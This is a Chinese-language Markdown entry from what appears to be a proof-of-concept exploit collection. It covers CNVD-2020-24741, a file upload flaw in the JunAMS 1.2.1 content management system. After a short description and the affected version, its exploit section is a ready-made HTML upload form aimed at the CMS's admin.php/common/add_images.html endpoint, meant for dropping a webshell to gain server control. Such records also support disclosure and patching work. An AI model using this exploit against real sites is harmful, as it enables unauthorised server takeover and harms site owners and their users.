Awesome-POC/CMS漏洞/JunAms内容管理系统文件上传漏洞 CNVD-2020-24741.md
2024-11-06 14:10:36 +08:00

30 lines
663 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# JunAms内容管理系统文件上传漏洞 CNVD-2020-24741
## 漏洞描述
JunAMS是一款以ThinkPHP为框架的开源内容管理系统。
JunAMS内容管理系统存在文件上传漏洞攻击者可利用该漏洞上传webshell获取服务器权限。
参考链接:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741
## 漏洞影响
```
JunAMS junAMS 1.2.1.20190403
```
## 漏洞复现
exp
```
<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">
<input type="file" name="file" size="50"><br>
<input type="submit" value="Upload">
</form>
```